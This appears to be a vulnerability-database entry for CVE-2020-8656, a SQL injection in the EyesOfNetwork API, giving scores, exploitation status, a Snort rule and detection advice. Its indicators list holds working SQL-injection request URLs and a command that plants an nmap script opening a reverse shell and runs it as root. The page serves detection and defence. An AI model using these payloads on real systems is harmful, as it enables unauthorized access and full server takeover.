cbcvebase.
CVE-2020-8656
published 2020-02-07

CVE-2020-8656: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
84.60%
99.7th percentile
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
eyesofnetworkeyesofnetwork

Detection & IOCsextracted from sources · hover to see the quote

url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
url/eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
path/eonapi/getApiKey
command' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '
path/eonapi/getApiKey
path/eonapi/createEonUser
path/tmp/h4k
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect SQL injection auth bypass attempts against the EyesOfNetwork API by monitoring HTTP GET requests to /eonapi/getApiKey where the username parameter contains UNION SELECT keywords.
  • The exploit uses a distinctive hardcoded MD5 hash value '1c85d47ff80b5ff2a4dd577e8e5f8e9d' in the UNION SELECT payload as the injected password field; presence of this string in HTTP URI parameters is a high-confidence indicator of exploitation.
  • A time-based blind SQLi probe uses sleep() in the username parameter; monitor for HTTP 401 responses to /eonapi/getApiKey with anomalously long response times (>=6 seconds) as a detection signal.
  • The exploit chain follows a predictable sequence: SQLi on /eonapi/getApiKey → POST to /eonapi/createEonUser → POST to /lilac/autodiscovery.php with a command-injected target[] parameter. Correlating these three endpoints in sequence from the same source IP is a strong indicator of full exploitation.
  • The exploit uses a distinctive non-standard User-Agent string; alert on this UA in web server logs as an indicator of the public PoC tool being used.
  • The command injection payload in the AutoDiscovery target field is prefixed with a semicolon and suffixed with a space and hash (;CMD #) to break out of the target context; monitor POST bodies to /lilac/autodiscovery.php for target[] values matching this pattern.
  • Post-exploitation artifact: watch for creation of NSE script files in /tmp/ (e.g., /tmp/h4k) followed by execution of nmap with a -script flag pointing to /tmp/, indicating privilege escalation via the apache→root nmap sudo path.
  • ·The Nuclei template uses a stop-at-first-match strategy: it first tries the auth-bypass UNION SELECT request and only falls back to the time-based sleep probe if the first request does not return EONAPI_KEY. The time-based probe uses a 6-second sleep with a 20-second timeout; tuning these thresholds may be needed in high-latency environments.
  • ·The Metasploit module requires HTTPS (SSL: true) and defaults to port 443; running the module against HTTP-only targets will fail.
  • ·The module attempts API key generation via hardcoded key first; only if that fails does it fall back to SQL injection. Detection rules should cover both the hardcoded-key path (CVE-2020-8657) and the SQLi path (CVE-2020-8656) to avoid blind spots.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.